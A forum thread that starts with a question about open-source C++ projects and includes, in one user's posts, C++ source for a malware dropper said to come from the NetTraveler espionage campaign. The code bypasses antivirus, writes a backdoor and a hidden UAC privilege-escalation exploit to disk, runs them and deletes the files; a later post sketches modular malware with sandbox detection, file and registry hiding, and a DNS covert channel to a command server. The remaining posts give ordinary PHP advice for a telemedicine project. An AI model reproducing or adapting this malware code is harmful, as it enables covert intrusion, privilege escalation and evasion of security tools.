Need help- How to start with open source C++ projects?

[A$HU]

I recommend a startup company then.

Just curious, what do you make of this program?

#include <windows.h>
#include <iostream>

// Functions for AntiVirus bypass
#include "bypass.hpp"

// Plain installer
#include "installer.hpp"

// Local privileges elevators
#include "x32_elevator.hpp"
#include "x64_elevator.hpp"

// ======= [BEGIN EASY COSTUMIZATION] =======
#define EXPLOIT_EXE_NAME    "temp.exe"
#define BACKDOOR_EXE_NAME    "net.exe"
// ======== [END EASY COSTUMIZATION] ========

#pragma warning(disable : 4996)            // Keep using GetVersionEx()

// Check if the system is vulnerable to a Local Privileges Escalation
BOOL IsVulnerableOS()
{
    OSVERSIONINFO osvInfo;

    memset(&osvInfo, 0, sizeof(OSVERSIONINFO));
    osvInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    // http://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
    // Check version is greater than Windows Vista ｩ
    if (GetVersionEx(&osvInfo))
        return osvInfo.dwMajorVersion == 6;

    return TRUE;
}

// Check if the architecture is 32 or 64 bit
BOOL IsAMD64()
{
    __tGetNativeSystemInfo lpfnGetNativeSystemInfo;
    SYSTEM_INFO sysInfo;

    memset(&sysInfo, 0, sizeof(SYSTEM_INFO));

    // Simple bypass for AV
    AV_BYPASS__GetNativeSystemInfo(lpfnGetNativeSystemInfo)

    if(NULL != lpfnGetNativeSystemInfo)
        lpfnGetNativeSystemInfo(&sysInfo);
    else
        GetSystemInfo(&sysInfo);

    // This is outdated wProcessorArchitecture instead of dwOemId should be used
    if ((WORD)sysInfo.dwOemId == PROCESSOR_ARCHITECTURE_AMD64)
        return TRUE;

    return FALSE;
}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    CHAR szShellExecute[14];

    CHAR szWorkFileName[MAX_PATH];
    CHAR szTempPath[MAX_PATH];
    CHAR szWorkDir[MAX_PATH];
    CHAR szNetPath[MAX_PATH];

    GetCurrentDirectory(MAX_PATH, szWorkDir);
    sprintf(szTempPath, "%s\\" EXPLOIT_EXE_NAME, szWorkDir);

    GetModuleFileName(NULL, szWorkFileName, MAX_PATH);
    FILE *f = fopen(szWorkFileName, "rb");

    if (NULL == f)
        return 0;

    // Inject configuration in the executable
    char lpBuf[288] = {};

    fseek(f, 688, 0);
    fread(lpBuf, 1, 288, f);

    memcpy(&g_lpInstaller[688], lpBuf, 288);

    HANDLE hNetHandle;
    __tShellExecute lpfnShellExecute;
    if (TRUE == IsVulnerableOS())
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and wait for privileges escalation
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        // Write exploit to attempt local privileges escalation
        // (See http://www.pretentiousname.com/misc/win7_uac_whitelist2.html for more info)
        HANDLE hTempHandle = CreateFile(szTempPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN, NULL);
        if (INVALID_HANDLE_VALUE != hTempHandle)
        {
            DWORD dwTempTmp = 0, dwSizeTemp;
            const unsigned char *lpBufTemp;

            if (TRUE == IsAMD64())
            {
                dwSizeTemp    = sizeof(g_lpElevator64); // Original size: 88576
                lpBufTemp    = g_lpElevator64;
            }
            else
            {
                dwSizeTemp    = sizeof(g_lpElevator32); // Original size: 81920
                lpBufTemp    = g_lpElevator32;
            }

            WriteFile(hTempHandle, lpBufTemp, dwSizeTemp, &dwTempTmp, 0);
            CloseHandle(hTempHandle);
        }

        Sleep(200);

        // Simple bypass for AV
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Execute the exploit and try to gain privileges
        if (NULL != lpfnShellExecute(NULL, "Open", szTempPath, NULL, NULL, SW_SHOWNORMAL))
        {
            Sleep(20000);

            DeleteFile(szTempPath);
            DeleteFile(szNetPath);

            return 0;
        }
    }
    else
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and skip privileges escalation
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp_ = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp_, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        Sleep(200);

        // Simple bypass for AV
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Execute the backdoor without escalating privileges
        if (lpfnShellExecute(NULL, "Open", szNetPath, NULL, NULL, SW_SHOWNORMAL))
        {
            // Simple bypass for AV
            AV_BYPASS__Sleep(20000)

            DeleteFile(szNetPath);
            return 0;
        }
    }

    return 0;
}

I just saw your edited post.I cant figure much out but you are trying to install something bypassing the antivirus.What is it actually?

 

[Kyusuibu Honbu]

I just saw your edited post.I cant figure much out but you are trying to install something bypassing the antivirus.What is it actually?

A project associated to C++ I am working on.

Its code from a module of a malware used by Chinese hackers in a cyber espionage campaing Indian Govt/ Research/ Financial institutions

Kaspersky Lab Uncovers ‘Operation NetTraveler,’ a Global Cyberespionage Campaign Targeting Government-Affiliated Organizations and Research Institutes

 

[A$HU]

A project associated to C++ I am working on.

Its code from a module of a malware used by Chinese hackers in a cyber espionage campaing Indian Govt/ Research/ Financial institutions

Kaspersky Lab Uncovers ‘Operation NetTraveler,’ a Global Cyberespionage Campaign Targeting Government-Affiliated Organizations and Research Institutes

So what are you developing to counter this?

 

[Spy Master]

I'm PHP developer, recently working in Laravel which is PHP's latest framework. Running my own little company in Lahore, we work primarily on web development.

Yaar now you have mentioned PHP can i get some help? a website is involved in my FYP which is based on Telemedicine ...its a CMS......i just want to notify a person whenever he gets message from doctor/patient or his data gets updated through wearable sensors...in short can you guide me how to notify? and the other thing is how to send message from one user account to other?

 

[Diggy]

@A$HU i remember once my friend was working on a project to remove bugs from notepad++ , it was open source and based on c++ if i am not wrong , just check it out.

 

[Jazzbot]

Yaar now you have mentioned PHP can i get some help? a website is involved in my FYP which is based on Telemedicine ...its a CMS......i just want to notify a person whenever he gets message from doctor/patient or his data gets updated through wearable sensors...in short can you guide me how to notify? and the other thing is how to send message from one user account to other?

Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform doctor / patient. Session lasts for short time. Alternatively, you can use cookies which are stored at client's system and contains the details. You can fetch details from cookies and then pass them to doctor etc. The best way is to use database, because of security of your data. Store the details in database and then fetch data from DB and dispatch to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.

 

[Diggy]

Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform doctor / patient. Session lasts for short time. Alternatively, you can use cookies which are stored at client's system and contains the details. You can fetch details from cookies and then pass them to doctor etc. The best way is to use database, because of security of your data. Store the details in database and then fetch data from DB and dispatch to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.

i din't clearly understand the requirements , but in php we usually to use session , whenever the user logs in use session and get the stored data .

or better for immediate notification we can use email , or mobile message APIs , i think we have those in PHP

 

[Jazzbot]

i din't clearly understand the requirements , but in php we usually to use session , whenever the user logs in use session and get the stored data .

or better for immediate notification we can use email , or mobile message APIs , i think we have those in PHP

We have all that in PHP plus a lot more things. Like I said before, due to lack of knowledge on exact requirements of his project, I kept things to basics i.e. Sessions, Cookies or Database.

 

[Kyusuibu Honbu]

So what are you developing to counter this?

That particular espionage campaign is defunct

I am just trying to rewrite the malware code in the below particular format, which would allow researchers to run various tests approaches to counter them.

// Initialize Modules
1: SteslthModule* pSthealth = init_StealthModule();
2: AntiForensicModule* pAntiForensic= init_AntiForensicModule();
3: CovertChannels* pCovertChannels = init_CovetChannels();
4: int main() {
…
// check whether the malware is running inside sandbox using
// all implemented methods
5: If (pAntiForensic->detectSandbox(DETECT_VMWARE_ALL) ||
(pAntiForensic->detectSandbox(DETECT_VBOX_ALL))
5.1 terminateProcess(0);
…
// Set process, file and registry hiding using various methods
6: pStealth->setProcessHideMethod(PH_3);
7: pStealth->setFilesHideMethod(FH_FILTER_DRIVER_7);
8: pStealth->setRegistryHideMethod(RH_REGHOOK_1);
…
// hidden channel to C&C server using DNS requests
9: pCovertChannels->setMethod(CC_DNS_9);
10: pCovertChannels->sendMessage(buff, server_ip);
…
}

 

[Spy Master]

Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform doctor / patient. Session lasts for short time. Alternatively, you can use cookies which are stored at client's system and contains the details. You can fetch details from cookies and then pass them to doctor etc. The best way is to use database, because of security of your data. Store the details in database and then fetch data from DB and dispatch to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.

Yes i have developed this and this is simple CMS...HTML/BOOTSTRAP for pages and designing and server side language is PHP.....I have completed it all...just these two things are remaining...!
now basic idea of my project is its a Telemedicine means Patient is in his home or some remote location and doctor is continuously monitoring him via web....I have to get sensor values from patient's body and after processing, transfer them to windows..this is all hardware's work..on software side i have a website and an android application...website will display all those sensor values....!
Now the thing is i have Doctor and Patient's accounts on website...I have a page which displays all the doctors... whenever patient clicks on any image of doctor,he gets registered to that doctor....Now Bro my requirement is upon getting a new patient doctor gets notified that he has a new patient XXXX...same as facebook whenever someone commented on any post we get a notification...This is the notification part...!

Second is just like two persons can chat on facebook with each other i want the same in my websit that doctor and patient can chat with each other...!

 

[Diggy]

Yes i have developed this and this is simple CMS...HTML/BOOTSTRAP for pages and designing and server side language is PHP.....I have completed it all...just these two things are remaining...!
now basic idea of my project is its a Telemedicine means Patient is in his home or some remote location and doctor is continuously monitoring him via web....I have to get sensor values from patient's body and after processing, transfer them to windows..this is all hardware's work..on software side i have a website and an android application...website will display all those sensor values....!
Now the thing is i have Doctor and Patient's accounts on website...I have a page which displays all the doctors... whenever patient clicks on any image of doctor,he gets registered to that doctor....Now Bro my requirement is upon getting a new patient doctor gets notified that he has a new patient XXXX...same as facebook whenever someone commented on any post we get a notification...This is the notification part...!

Second is just like two persons can chat on facebook with each other i want the same in my websit that doctor and patient can chat with each other...!

its all a game of database , sessions and php mate , if you can take care of the sensors part i can easily do this notification thing for you.

when patient clicks on the doc pic redirect to a php script , before that create a table in phpmyadmin called patient_register with attributes

patient_ssn , doc_ssn , time_ofreg , flag(initially flag is set to 1)


ssn here is a unique identification var given to users , doc logs in , get his ssn in a session variable , for his ssn search the patient_register table for matching doc_ssn , if does check flag if set to 1 , if yes then display the patient data using patient_ssn and a message that he just registered for you on his home page and set the flag to zero(means displayed) and you can also display the date , time when he registered using time_ofreg (check system date/time php fuction)

as far as chatting is concerned you get a chat messenger module , you can integrate it.

 

[Spy Master]

its all a game of database , sessions and php mate , if you can take care of the sensors part i can easily do this notification thing for you.

when patient clicks on the doc pic redirect to a php script , before that create a table in phpmyadmin called patient_register with attributes

patient_ssn , doc_ssn , time_ofreg , flag(initially flag is set to 1)


ssn here is a unique identification var given to users , doc logs in , get his ssn in a session variable , for his ssn search the patient_register table for matching doc_ssn , if does check flag if set to 1 , if yes then display the patient data using patient_ssn and a message that he just registered for you on his home page and set the flag to zero(means displayed) and you can also display the date , time when he registered using time_ofreg (check system date/time php fuction)

as far as chatting is concerned you get a chat messenger module , you can integrate it.

how can i display it on doc's page like a notification thingy? Do i have to use CSS again? i am not a software engineer and i dont know much about Designing...

@Zebra can you give me links of those messenger modules?

 

[Diggy]

how can i display it on doc's page like a notification thingy? Do i have to use CSS again? i am not a software engineer and i dont know much about Designing...

look a simple approach would be give a notification button in home page where he goes after a log in , doc clicks the notif button , the button hyperlinks to a hyperlink.php file which gets all the info from database and displays it a table format in the notifications page of the website.

if you want to make it look attractive then you can turn the notification button red if there are any notifications for , the number of notifications all can be worked out but a bit more work.

 

[Spy Master]

look a simple approach would be give a notification button in home page where he goes after a log in , doc clicks the notif button , the button hyperlinks to a hyperlink.php file which gets all the info from database and displays it a table format in the notifications page of the website.

if you want to make it look attractive then you can turn the notification button red if there are any notifications for , the number of notifications all can be worked out but a bit more work.

yeah i think i already have a drop down class...Thanks for the help bro....i will tell you once i get it done

 

[Donatello]

I'm PHP developer, recently working in Laravel which is PHP's latest framework. Running my own little company in Lahore, we work primarily on web development.

Is PHP better or Ruby on rails?
Which one would you suggest to someone starting new in Web development?